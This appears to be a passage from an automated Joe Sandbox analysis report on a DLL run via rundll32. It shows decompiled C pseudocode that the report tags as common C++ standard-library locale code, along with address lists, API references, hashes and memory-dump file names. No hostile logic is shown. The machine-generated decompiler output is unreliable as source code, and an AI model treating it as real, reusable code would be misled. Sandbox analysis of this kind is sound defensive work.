										E6E2200AC(0x6e2683cf, _t203, _t267, _t274, 0x14);
										E6E206653(_t286 - 0x14, 0);
										_t275 =  *0x6e2c6dfc; // 0x0
										 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
										 *(_t286 - 0x10) = _t275;
										_t123 = E6E1E161C(0x6e2c6da8);
										_t220 =  *((intOrPtr*)(_t286 + 8));
										_t268 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t123);
										__eflags = _t268;
										if(_t268 != 0) {
											L19:
											E6E2066BA(_t286 - 0x14);
											return E6E220075(_t268);
										} else {
											__eflags = _t275;
											if(_t275 == 0) {
												_push( *((intOrPtr*)(_t286 + 8)));
												_push(_t286 - 0x10);
												__eflags = E6E2114EC(_t203, _t220, __edx, _t268, _t275) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t286 - 0x20);
													E6E223D74(_t286 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t203, _t268, _t275, 0x14);
													E6E206653(_t286 - 0x14, 0);
													_t276 =  *0x6e2c6dcc; // 0x0
													 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
													 *(_t286 - 0x10) = _t276;
													_t136 = E6E1E161C(0x6e2c6d80);
													_t227 =  *((intOrPtr*)(_t286 + 8));
													_t269 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t136);
													__eflags = _t269;
													if(_t269 != 0) {
														L26:
														E6E2066BA(_t286 - 0x14);
														return E6E220075(_t269);
													} else {
														__eflags = _t276;
														if(_t276 == 0) {
															_push( *((intOrPtr*)(_t286 + 8)));
															_push(_t286 - 0x10);
															__eflags = E6E211558(_t203, _t227, _t264, _t269, _t276) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t286 - 0x20);
																E6E223D74(_t286 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t203, _t269, _t276, 0x14);
																E6E206653(_t286 - 0x14, 0);
																_t277 =  *0x6e2c6e00; // 0x0
																 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																 *(_t286 - 0x10) = _t277;
																_t149 = E6E1E161C(0x6e2c6dac);
																_t234 =  *((intOrPtr*)(_t286 + 8));
																_t270 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t149);
																__eflags = _t270;
																if(_t270 != 0) {
																	L33:
																	E6E2066BA(_t286 - 0x14);
																	return E6E220075(_t270);
																} else {
																	__eflags = _t277;
																	if(_t277 == 0) {
																		_push( *((intOrPtr*)(_t286 + 8)));
																		_push(_t286 - 0x10);
																		__eflags = E6E2115C4(_t203, _t234, _t264, _t270, _t277) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t286 - 0x20);
																			E6E223D74(_t286 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t203, _t270, _t277, 0x14);
																			E6E206653(_t286 - 0x14, 0);
																			_t278 =  *0x6e2c6dd0; // 0x0
																			 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																			 *(_t286 - 0x10) = _t278;
																			_t162 = E6E1E161C(0x6e2c6d60);
																			_t241 =  *((intOrPtr*)(_t286 + 8));
																			_t271 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t162);
																			__eflags = _t271;
																			if(_t271 != 0) {
																				L40:
																				E6E2066BA(_t286 - 0x14);
																				return E6E220075(_t271);
																			} else {
																				__eflags = _t278;
																				if(_t278 == 0) {
																					_push( *((intOrPtr*)(_t286 + 8)));
																					_push(_t286 - 0x10);
																					__eflags = E6E21162A(_t203, _t241, _t264, _t271, _t278) - 0xffffffff;
																					if(__eflags == 0) {
																						_t245 = _t286 - 0x20;
																						E6E1E1438(_t245);
																						E6E223D74(_t286 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e26851f, _t203, _t271, _t278, 4);
																						_t279 = _t245;
																						 *(_t286 - 0x10) = _t279;
																						 *((intOrPtr*)(_t279 + 4)) =  *((intOrPtr*)(_t286 + 0xc));
																						_push( *((intOrPtr*)(_t286 + 0x14)));
																						_t91 = _t286 - 4;
																						 *_t91 =  *(_t286 - 4) & 0x00000000;
																						__eflags =  *_t91;
																						 *_t279 = 0x6e26c0c4;
																						 *((char*)(_t279 + 0x28)) =  *((intOrPtr*)(_t286 + 0x10));
																						E6E21542F(_t203, _t245, _t264, _t271, _t279,  *_t91);
																						return E6E220075(_t279,  *((intOrPtr*)(_t286 + 8)));
																					} else {
																						_t271 =  *(_t286 - 0x10);
																						 *(_t286 - 0x10) = _t271;
																						 *(_t286 - 4) = 1;
																						E6E206FD3(__eflags, _t271);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t271 + 4))))();
																						 *0x6e2c6dd0 = _t271;
																						goto L40;
																					}
																				} else {
																					_t271 = _t278;
																					goto L40;
																				}
																			}
																		} else {
																			_t270 =  *(_t286 - 0x10);
																			 *(_t286 - 0x10) = _t270;
																			 *(_t286 - 4) = 1;
																			E6E206FD3(__eflags, _t270);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t270 + 4))))();
																			 *0x6e2c6e00 = _t270;
																			goto L33;
																		}
																	} else {
																		_t270 = _t277;
																		goto L33;
																	}
																}
															} else {
																_t269 =  *(_t286 - 0x10);
																 *(_t286 - 0x10) = _t269;
																 *(_t286 - 4) = 1;
																E6E206FD3(__eflags, _t269);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t269 + 4))))();
																 *0x6e2c6dcc = _t269;
																goto L26;
															}
														} else {
															_t269 = _t276;
															goto L26;
														}
													}
												} else {
													_t268 =  *(_t286 - 0x10);
													 *(_t286 - 0x10) = _t268;
													 *(_t286 - 4) = 1;
													E6E206FD3(__eflags, _t268);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t268 + 4))))();
													 *0x6e2c6dfc = _t268;
													goto L19;
												}
											} else {
												_t268 = _t275;
												goto L19;
											}
										}
									} else {
										_t267 =  *(_t286 - 0x10);
										 *(_t286 - 0x10) = _t267;
										 *(_t286 - 4) = 1;
										E6E206FD3(__eflags, _t267);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t267 + 4))))();
										 *0x6e2c6de0 = _t267;
										goto L12;
									}
								} else {
									_t267 = _t274;
									goto L12;
								}
							}
						} else {
							_t266 =  *(_t286 - 0x10);
							 *(_t286 - 0x10) = _t266;
							 *(_t286 - 4) = 1;
							E6E206FD3(__eflags, _t266);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t266 + 4))))();
							 *0x6e2c6ddc = _t266;
							goto L5;
						}
					} else {
						_t266 = _t273;
						goto L5;
					}
				}
			}

0x6e20f94b
0x6e20f94b
0x6e20f952
0x6e20f95c
0x6e20f961
0x6e20f96c
0x6e20f970
0x6e20f973
0x6e20f978
0x6e20f97c
0x6e20f981
0x6e20f985
0x6e20f9ca
0x6e20f9cd
0x6e20f9d9
0x6e20f987
0x6e20f989
0x6e20f98f
0x6e20f995
0x6e20f99d
0x6e20f9a0
0x6e20f9dd
0x6e20f9eb
0x6e20f9f0
0x6e20f9f8
0x6e20fa02
0x6e20fa07
0x6e20fa12
0x6e20fa16
0x6e20fa19
0x6e20fa1e
0x6e20fa27
0x6e20fa29
0x6e20fa2b
0x6e20fa70
0x6e20fa73
0x6e20fa7f
0x6e20fa2d
0x6e20fa2d
0x6e20fa2f
0x6e20fa35
0x6e20fa3b
0x6e20fa43
0x6e20fa46
0x6e20fa83
0x6e20fa91
0x6e20fa96
0x6e20fa9e
0x6e20faa8
0x6e20faad
0x6e20fab8
0x6e20fabc
0x6e20fabf
0x6e20fac4
0x6e20facd
0x6e20facf
0x6e20fad1
0x6e20fb16
0x6e20fb19
0x6e20fb25
0x6e20fad3
0x6e20fad3
0x6e20fad5
0x6e20fadb
0x6e20fae1
0x6e20fae9
0x6e20faec
0x6e20fb29
0x6e20fb37
0x6e20fb3c
0x6e20fb44
0x6e20fb4e
0x6e20fb53
0x6e20fb5e
0x6e20fb62
0x6e20fb65
0x6e20fb6a
0x6e20fb73
0x6e20fb75
0x6e20fb77
0x6e20fbbc
0x6e20fbbf
0x6e20fbcb
0x6e20fb79
0x6e20fb79
0x6e20fb7b
0x6e20fb81
0x6e20fb87
0x6e20fb8f
0x6e20fb92
0x6e20fbcf
0x6e20fbdd
0x6e20fbe2
0x6e20fbea
0x6e20fbf4
0x6e20fbf9
0x6e20fc04
0x6e20fc08
0x6e20fc0b
0x6e20fc10
0x6e20fc19
0x6e20fc1b
0x6e20fc1d
0x6e20fc62
0x6e20fc65
0x6e20fc71
0x6e20fc1f
0x6e20fc1f
0x6e20fc21
0x6e20fc27
0x6e20fc2d
0x6e20fc35
0x6e20fc38
0x6e20fc75
0x6e20fc83
0x6e20fc88
0x6e20fc90
0x6e20fc9a
0x6e20fc9f
0x6e20fcaa
0x6e20fcae
0x6e20fcb1
0x6e20fcb6
0x6e20fcbf
0x6e20fcc1
0x6e20fcc3
0x6e20fd08
0x6e20fd0b
0x6e20fd17
0x6e20fcc5
0x6e20fcc5
0x6e20fcc7
0x6e20fccd
0x6e20fcd3
0x6e20fcdb
0x6e20fcde
0x6e20fd18
0x6e20fd1b
0x6e20fd29
0x6e20fd2e
0x6e20fd36
0x6e20fd3b
0x6e20fd3d
0x6e20fd43
0x6e20fd46
0x6e20fd4f
0x6e20fd4f
0x6e20fd4f
0x6e20fd53
0x6e20fd59
0x6e20fd5c
0x6e20fd68
0x6e20fce0
0x6e20fce0
0x6e20fce3
0x6e20fce7
0x6e20fceb
0x6e20fcf8
0x6e20fd00
0x6e20fd02
0x00000000
0x6e20fd02
0x6e20fcc9
0x6e20fcc9
0x00000000
0x6e20fcc9
0x6e20fcc7
0x6e20fc3a
0x6e20fc3a
0x6e20fc3d
0x6e20fc41
0x6e20fc45
0x6e20fc52
0x6e20fc5a
0x6e20fc5c
0x00000000
0x6e20fc5c
0x6e20fc23
0x6e20fc23
0x00000000
0x6e20fc23
0x6e20fc21
0x6e20fb94
0x6e20fb94
0x6e20fb97
0x6e20fb9b
0x6e20fb9f
0x6e20fbac
0x6e20fbb4
0x6e20fbb6
0x00000000
0x6e20fbb6
0x6e20fb7d
0x6e20fb7d
0x00000000
0x6e20fb7d
0x6e20fb7b
0x6e20faee
0x6e20faee
0x6e20faf1
0x6e20faf5
0x6e20faf9
0x6e20fb06
0x6e20fb0e
0x6e20fb10
0x00000000
0x6e20fb10
0x6e20fad7
0x6e20fad7
0x00000000
0x6e20fad7
0x6e20fad5
0x6e20fa48
0x6e20fa48
0x6e20fa4b
0x6e20fa4f
0x6e20fa53
0x6e20fa60
0x6e20fa68
0x6e20fa6a
0x00000000
0x6e20fa6a
0x6e20fa31
0x6e20fa31
0x00000000
0x6e20fa31
0x6e20fa2f
0x6e20f9a2
0x6e20f9a2
0x6e20f9a5
0x6e20f9a9
0x6e20f9ad
0x6e20f9ba
0x6e20f9c2
0x6e20f9c4
0x00000000
0x6e20f9c4
0x6e20f98b
0x6e20f98b
0x00000000
0x6e20f98b
0x6e20f989

APIs

__EH_prolog3.LIBCMT ref: 6E20F952
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F95C
int.LIBCPMT ref: 6E20F973

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E20F9AD
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F9CD
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F9EB

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: c9718dbf1462f6be3960883d7f56220b603d32b925b0a5ba70420e688d8e2fa2
Instruction ID: ce6fa70b025c62a46b7333a44e3d8e80089853d9f02c56ddcf649cf6b11fcda8
Opcode Fuzzy Hash: c9718dbf1462f6be3960883d7f56220b603d32b925b0a5ba70420e688d8e2fa2
Instruction Fuzzy Hash: DF11C17991052D9BCB00EBE0C894AEEB77BBF44B18F244909E4106B2D0DB74AA45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E204747, Relevance: 9.1, APIs: 6, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E6E204747(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t18;
				intOrPtr* _t19;
				intOrPtr* _t39;
				intOrPtr* _t44;
				void* _t47;

				E6E2200AC(0x6e26816f, __ebx, __edi, __esi, 0x18);
				E6E206653(_t47 - 0x14, 0);
				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				_t44 =  *0x6e2dce7c; // 0x719038
				 *((intOrPtr*)(_t47 - 0x10)) = _t44;
				_t18 = E6E1E161C(0x6e2dce90);
				_t35 =  *((intOrPtr*)(_t47 + 8));
				_t19 = E6E1E171B( *((intOrPtr*)(_t47 + 8)), _t18);
				_t46 = _t19;
				if(_t19 != 0) {
					L5:
					E6E2066BA(_t47 - 0x14);
					return E6E220075(_t46);
				} else {
					if(_t44 == 0) {
						_push( *((intOrPtr*)(_t47 + 8)));
						_push(_t47 - 0x10);
						__eflags = E6E204F5F(__ebx, _t35, __edx, _t44, _t46) - 0xffffffff;
						if(__eflags == 0) {
							_t39 = _t47 - 0x20;
							E6E1E1438(_t39);
							E6E223D74(_t47 - 0x20, 0x6e2c3504);
							asm("int3");
							 *_t39 = __edx;
							return _t39;
						} else {
							_t46 =  *((intOrPtr*)(_t47 - 0x10));
							 *((intOrPtr*)(_t47 - 0x10)) = _t46;
							 *(_t47 - 4) = 1;
							E6E206FD3(__eflags, _t46);
							 *((intOrPtr*)( *_t46 + 4))();
							 *0x6e2dce7c = _t46;
							goto L5;
						}
					} else {
						_t46 = _t44;
						goto L5;
					}
				}
			}

0x6e20474e
0x6e204758
0x6e20475d
0x6e204766
0x6e20476c
0x6e20476f
0x6e204774
0x6e204778
0x6e20477d
0x6e204781
0x6e2047bc
0x6e2047bf
0x6e2047cb
0x6e204783
0x6e204785
0x6e20478b
0x6e204791
0x6e204799
0x6e20479c
0x6e2047cc
0x6e2047cf
0x6e2047dd
0x6e2047e2
0x6e2047e3
0x6e2047e7
0x6e20479e
0x6e20479e
0x6e2047a1
0x6e2047a5
0x6e2047a9
0x6e2047b3
0x6e2047b6
0x00000000
0x6e2047b6
0x6e204787
0x6e204787
0x00000000
0x6e204787
0x6e204785

APIs

__EH_prolog3.LIBCMT ref: 6E20474E
std::_Lockit::_Lockit.LIBCPMT ref: 6E204758
int.LIBCPMT ref: 6E20476F

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E2047A9
std::_Lockit::~_Lockit.LIBCPMT ref: 6E2047BF
__CxxThrowException@8.LIBVCRUNTIME ref: 6E2047DD

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 9b0f32715b87e54a1759bc649193e9872409a344bc4b164295a414ea61986916
Instruction ID: 6873a31d7f9ff45d95f5d602d1511cfdbbcd75cbc473d54ac18203b7e4455c53
Opcode Fuzzy Hash: 9b0f32715b87e54a1759bc649193e9872409a344bc4b164295a414ea61986916
Instruction Fuzzy Hash: 3111E379E0051D9FCB05DBE0C854AEDB7BAAF15714F108918E524AB2D0DBB49A45C790

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F7FF, Relevance: 9.1, APIs: 6, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E6E20F7FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t125;
				signed int _t126;
				void* _t138;
				void* _t151;
				void* _t164;
				void* _t177;
				void* _t190;
				void* _t203;
				void* _t216;
				signed int _t321;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				void* _t374;

				_t346 = __edx;
				_t265 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t374 - 0x14, 0);
				_t357 =  *0x6e2c6dd8; // 0x0
				 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
				 *(_t374 - 0x10) = _t357;
				_t125 = E6E1E161C(0x6e2c6d84);
				_t268 =  *((intOrPtr*)(_t374 + 8));
				_t126 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t125);
				_t348 = _t126;
				if(_t126 != 0) {
					L5:
					E6E2066BA(_t374 - 0x14);
					return E6E220075(_t348);
				} else {
					if(_t357 == 0) {
						_push( *((intOrPtr*)(_t374 + 8)));
						_push(_t374 - 0x10);
						__eflags = E6E211339(__ebx, _t268, __edx, _t348, _t357) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t374 - 0x20);
							E6E223D74(_t374 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t348, _t357, 0x14);
							E6E206653(_t374 - 0x14, 0);
							_t358 =  *0x6e2c6db0; // 0x0
							 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
							 *(_t374 - 0x10) = _t358;
							_t138 = E6E1E161C(0x6e2c6d64);
							_t275 =  *((intOrPtr*)(_t374 + 8));
							_t349 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t138);
							__eflags = _t349;
							if(_t349 != 0) {
								L12:
								E6E2066BA(_t374 - 0x14);
								return E6E220075(_t349);
							} else {
								__eflags = _t358;
								if(_t358 == 0) {
									_push( *((intOrPtr*)(_t374 + 8)));
									_push(_t374 - 0x10);
									__eflags = E6E2113A1(_t265, _t275, __edx, _t349, _t358) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t374 - 0x20);
										E6E223D74(_t374 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t265, _t349, _t358, 0x14);
										E6E206653(_t374 - 0x14, 0);
										_t359 =  *0x6e2c6ddc; // 0x0
										 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
										 *(_t374 - 0x10) = _t359;
										_t151 = E6E1E161C(0x6e2c6d88);
										_t282 =  *((intOrPtr*)(_t374 + 8));
										_t350 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t151);
										__eflags = _t350;
										if(_t350 != 0) {
											L19:
											E6E2066BA(_t374 - 0x14);
											return E6E220075(_t350);
										} else {
											__eflags = _t359;
											if(_t359 == 0) {
												_push( *((intOrPtr*)(_t374 + 8)));
												_push(_t374 - 0x10);
												__eflags = E6E211409(_t265, _t282, __edx, _t350, _t359) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t374 - 0x20);
													E6E223D74(_t374 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t265, _t350, _t359, 0x14);
													E6E206653(_t374 - 0x14, 0);
													_t360 =  *0x6e2c6de0; // 0x0
													 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
													 *(_t374 - 0x10) = _t360;
													_t164 = E6E1E161C(0x6e2c6d8c);
													_t289 =  *((intOrPtr*)(_t374 + 8));
													_t351 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t164);
													__eflags = _t351;
													if(_t351 != 0) {
														L26:
														E6E2066BA(_t374 - 0x14);
														return E6E220075(_t351);
													} else {
														__eflags = _t360;
														if(_t360 == 0) {
															_push( *((intOrPtr*)(_t374 + 8)));
															_push(_t374 - 0x10);
															__eflags = E6E211471(_t265, _t289, _t346, _t351, _t360) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t374 - 0x20);
																E6E223D74(_t374 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t265, _t351, _t360, 0x14);
																E6E206653(_t374 - 0x14, 0);
																_t361 =  *0x6e2c6dfc; // 0x0
																 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																 *(_t374 - 0x10) = _t361;
																_t177 = E6E1E161C(0x6e2c6da8);
																_t296 =  *((intOrPtr*)(_t374 + 8));
																_t352 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t177);
																__eflags = _t352;
																if(_t352 != 0) {
																	L33:
																	E6E2066BA(_t374 - 0x14);
																	return E6E220075(_t352);
																} else {
																	__eflags = _t361;
																	if(_t361 == 0) {
																		_push( *((intOrPtr*)(_t374 + 8)));
																		_push(_t374 - 0x10);
																		__eflags = E6E2114EC(_t265, _t296, _t346, _t352, _t361) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t374 - 0x20);
																			E6E223D74(_t374 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t265, _t352, _t361, 0x14);
																			E6E206653(_t374 - 0x14, 0);
																			_t362 =  *0x6e2c6dcc; // 0x0
																			 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																			 *(_t374 - 0x10) = _t362;
																			_t190 = E6E1E161C(0x6e2c6d80);
																			_t303 =  *((intOrPtr*)(_t374 + 8));
																			_t353 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t190);
																			__eflags = _t353;
																			if(_t353 != 0) {
																				L40:
																				E6E2066BA(_t374 - 0x14);
																				return E6E220075(_t353);
																			} else {
																				__eflags = _t362;
																				if(_t362 == 0) {
																					_push( *((intOrPtr*)(_t374 + 8)));
																					_push(_t374 - 0x10);
																					__eflags = E6E211558(_t265, _t303, _t346, _t353, _t362) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t374 - 0x20);
																						E6E223D74(_t374 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t265, _t353, _t362, 0x14);
																						E6E206653(_t374 - 0x14, 0);
																						_t363 =  *0x6e2c6e00; // 0x0
																						 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																						 *(_t374 - 0x10) = _t363;
																						_t203 = E6E1E161C(0x6e2c6dac);
																						_t310 =  *((intOrPtr*)(_t374 + 8));
																						_t354 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t203);
																						__eflags = _t354;
																						if(_t354 != 0) {
																							L47:
																							E6E2066BA(_t374 - 0x14);
																							return E6E220075(_t354);
																						} else {
																							__eflags = _t363;
																							if(_t363 == 0) {
																								_push( *((intOrPtr*)(_t374 + 8)));
																								_push(_t374 - 0x10);
																								__eflags = E6E2115C4(_t265, _t310, _t346, _t354, _t363) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t374 - 0x20);
																									E6E223D74(_t374 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t265, _t354, _t363, 0x14);
																									E6E206653(_t374 - 0x14, 0);
																									_t364 =  *0x6e2c6dd0; // 0x0
																									 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																									 *(_t374 - 0x10) = _t364;
																									_t216 = E6E1E161C(0x6e2c6d60);
																									_t317 =  *((intOrPtr*)(_t374 + 8));
																									_t355 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t216);
																									__eflags = _t355;
																									if(_t355 != 0) {
																										L54:
																										E6E2066BA(_t374 - 0x14);
																										return E6E220075(_t355);
																									} else {
																										__eflags = _t364;
																										if(_t364 == 0) {
																											_push( *((intOrPtr*)(_t374 + 8)));
																											_push(_t374 - 0x10);
																											__eflags = E6E21162A(_t265, _t317, _t346, _t355, _t364) - 0xffffffff;
																											if(__eflags == 0) {
																												_t321 = _t374 - 0x20;
																												E6E1E1438(_t321);
																												E6E223D74(_t374 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e26851f, _t265, _t355, _t364, 4);
																												_t365 = _t321;
																												 *(_t374 - 0x10) = _t365;
																												 *((intOrPtr*)(_t365 + 4)) =  *((intOrPtr*)(_t374 + 0xc));
																												_push( *((intOrPtr*)(_t374 + 0x14)));
																												_t119 = _t374 - 4;
																												 *_t119 =  *(_t374 - 4) & 0x00000000;
																												__eflags =  *_t119;
																												 *_t365 = 0x6e26c0c4;
																												 *((char*)(_t365 + 0x28)) =  *((intOrPtr*)(_t374 + 0x10));
																												E6E21542F(_t265, _t321, _t346, _t355, _t365,  *_t119);
																												return E6E220075(_t365,  *((intOrPtr*)(_t374 + 8)));
																											} else {
																												_t355 =  *(_t374 - 0x10);
																												 *(_t374 - 0x10) = _t355;
																												 *(_t374 - 4) = 1;
																												E6E206FD3(__eflags, _t355);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t355 + 4))))();
																												 *0x6e2c6dd0 = _t355;
																												goto L54;
																											}
																										} else {
																											_t355 = _t364;
																											goto L54;
																										}
																									}
																								} else {
																									_t354 =  *(_t374 - 0x10);
																									 *(_t374 - 0x10) = _t354;
																									 *(_t374 - 4) = 1;
																									E6E206FD3(__eflags, _t354);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t354 + 4))))();
																									 *0x6e2c6e00 = _t354;
																									goto L47;
																								}
																							} else {
																								_t354 = _t363;
																								goto L47;
																							}
																						}
																					} else {
																						_t353 =  *(_t374 - 0x10);
																						 *(_t374 - 0x10) = _t353;
																						 *(_t374 - 4) = 1;
																						E6E206FD3(__eflags, _t353);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t353 + 4))))();
																						 *0x6e2c6dcc = _t353;
																						goto L40;
																					}
																				} else {
																					_t353 = _t362;
																					goto L40;
																				}
																			}
																		} else {
																			_t352 =  *(_t374 - 0x10);
																			 *(_t374 - 0x10) = _t352;
																			 *(_t374 - 4) = 1;
																			E6E206FD3(__eflags, _t352);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t352 + 4))))();
																			 *0x6e2c6dfc = _t352;
																			goto L33;
																		}
																	} else {
																		_t352 = _t361;
																		goto L33;
																	}
																}
															} else {
																_t351 =  *(_t374 - 0x10);
																 *(_t374 - 0x10) = _t351;
																 *(_t374 - 4) = 1;
																E6E206FD3(__eflags, _t351);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t351 + 4))))();
																 *0x6e2c6de0 = _t351;
																goto L26;
															}
														} else {
															_t351 = _t360;
															goto L26;
														}
													}
												} else {
													_t350 =  *(_t374 - 0x10);
													 *(_t374 - 0x10) = _t350;
													 *(_t374 - 4) = 1;
													E6E206FD3(__eflags, _t350);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t350 + 4))))();
													 *0x6e2c6ddc = _t350;
													goto L19;
												}
											} else {
												_t350 = _t359;
												goto L19;
											}
										}
									} else {
										_t349 =  *(_t374 - 0x10);
										 *(_t374 - 0x10) = _t349;
										 *(_t374 - 4) = 1;
										E6E206FD3(__eflags, _t349);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t349 + 4))))();
										 *0x6e2c6db0 = _t349;
										goto L12;
									}
								} else {
									_t349 = _t358;
									goto L12;
								}
							}
						} else {
							_t348 =  *(_t374 - 0x10);
							 *(_t374 - 0x10) = _t348;
							 *(_t374 - 4) = 1;
							E6E206FD3(__eflags, _t348);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t348 + 4))))();
							 *0x6e2c6dd8 = _t348;
							goto L5;
						}
					} else {
						_t348 = _t357;
						goto L5;
					}
				}
			}

0x6e20f7ff
0x6e20f7ff
0x6e20f806
0x6e20f810
0x6e20f815
0x6e20f820
0x6e20f824
0x6e20f827
0x6e20f82c
0x6e20f830
0x6e20f835
0x6e20f839
0x6e20f87e
0x6e20f881
0x6e20f88d
0x6e20f83b
0x6e20f83d
0x6e20f843
0x6e20f849
0x6e20f851
0x6e20f854
0x6e20f891
0x6e20f89f
0x6e20f8a4
0x6e20f8ac
0x6e20f8b6
0x6e20f8bb
